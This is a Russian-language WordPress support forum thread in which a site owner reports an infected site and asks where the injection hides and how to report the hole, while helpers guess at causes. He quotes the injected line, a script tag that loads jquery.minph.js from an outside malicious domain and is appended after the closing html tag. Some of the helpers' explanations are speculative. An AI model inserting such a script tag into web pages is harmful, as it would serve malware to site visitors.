• Решено lppp

    (@lppp)


    Уважаемые, есть серия сайтов, разных версий, один из сайтов в последней версии находится, зашел с хрома недавно и увидел что сайт заражен.
    Открыл хтмл код и нашел:

    ...
    </div>
    </div>
    </div>
    <div class=»box-b»> </div>
    </div>
    </div>
    </div>
    </div>

    </body>
    </html><script src=»http://rhine2239oldmid.cz.cc/jquery.minph.js»></script&gt;`

    т.е. это саый конец страницы, вставка идет после закрытия тега ХТМЛ.

    искал пробовал по разным файлам — где вставка производится НЕ МОГУ найти, и ещё не могу понять, как взломали? т.е. где уязвимость?

    помогите помочь решить проблему, и скажите, как написать разработчикам об уязвимости?

Просмотр 15 ответов — с 1 по 15 (всего 16)
  • Заражают, взломом движка, популярные ресурсы. У Вас скорее всего или соседи по хостингу заразили, или «кривой» плагин (тема), или через кражу пароля — .ftp... Начните со своего компьютера сначала — проверьте..

    Автор lppp

    (@lppp)

    а вот живой пример — на стандартном движке даже — agonnoga.pp.ru
    посмотрите, скажите, где эта дрянь сидит? как удалить?

    копируйте строчку, которая вам не нравится — вставляете в гугл поиск и вы найдете решение и описание всего, дерзайте 🙂

    Модератор Юрій

    (@yube)

    Сказать, где зараза, глядя на «фотографию», может только экстрасенс, да и то, как показала битва, далеко не каждый и отнюдь не всегда.

    Автор lppp

    (@lppp)

    мой комп чист, только что проверил. плюс всегда висит ДРвеб на фоне, спайдер.

    про темы\плагин — заражены даже сайты в стандартной сборке!..

    кража пароля? как например? а что за ссылка?

    и в итоге — как избавиться от этого заражения? где оно?

    Автор lppp

    (@lppp)

    2 Юрий, а как тогда мне найти её?
    Просто думал по хтмл коду можно найти, думал раз в конце вставка — значит index.php или footer.php, но нет, там не нашлось:(

    Вы похожи на паникера… Зачем себя так ведете? В коде, который Вы привели, там скрипт ….js вот его скопируйте и в гугл… Там найдете ответы..

    думал раз в конце вставка

    в конце вставка — могут скрипты загружаться через wp_footer

    Автор lppp

    (@lppp)

    minimarket, гугл и яндекс молчат про это.
    а wp_footer не нашёл(

    где он лежит, скажите пожалуйста

    Напишите название шаблона и/или ссылку откуда скачивали.
    начнем с нее..
    или используя сервис pastebin.com скопируйте туда содержимое файлов из своей, активной темы (не хтмл код, а внутренности этих файлов)… конкретно интересуют header.php footer.php sidebar.php function.php (пока все)
    и если есть плагины — отключите их на время… посмотрите без них — осталась зараза?
    и еще — какие права были выставлены на папку с темой и файлы в ней? (интересует chmod)

    Автор lppp

    (@lppp)

    тема стандартная:

    Michael Heilemann на 1.6: WordPress Default

    The default WordPress theme based on the famous Kubrick.

    Файлы этой «темы» расположены в директории /themes/default.

    Метки: blue, custom header, fixed width, two columns, widgets

    http://pastebin.com/xCenx8Zq — header
    http://pastebin.com/zq7a70JV — footer
    http://pastebin.com/S045xC4C — sidebar
    http://pastebin.com/ge44neUq — functions

    плагины вырубил, проблема осталась…

    на папку ЧМОД стоит 755, файлы внутри 644

    Автор lppp

    (@lppp)

    зы скачал свежую тему изнутри админки, из поиска, и всё равно осталась проблема…

    Atrax

    (@atrax)

    Ethical engineer

    Меня терзают смутные сомнения.
    Откуда брали дистрибутив?

    В общем рассмотрел все варианты, нашел схожую информацию. Суть в том, что некоторые вирусы так цепляются через браузер (именно приписка после тега body). Может от установленного расширения в браузере (вероятно). А когда вы заходите на свой сайт (логин-пароль) он прописывается в движке..(правда не понял как и когда)… Содержимое скрипта (согласно гугл) тянется с порно сайтов..
    ====
    Это всего лишь предположение.. Надо конкретно смотреть ваш сайт (изнутри)

    Автор lppp

    (@lppp)

    Atrax, дистрибутив с mywordpress.ru

    minimarket, могу предоставить Вам доступ ФТПшный к сайту…
    поможете?

    Браузера вина исключена — со своей машины тестил с 3х разных, суть одна и та же, плюс в фоне висит антивирь, и проверил специально сканером веба.
    А так же взял у друга ноут и с него потестил — то же самое. вирь…

    Про логин-пароль… заражены те сайты, в админку которых я не заходил месяцы уже…

Просмотр 15 ответов — с 1 по 15 (всего 16)
  • Тема «Новая уязвимость ВП 3.1.2! Взломали сайты на хостинге, во» закрыта для новых ответов.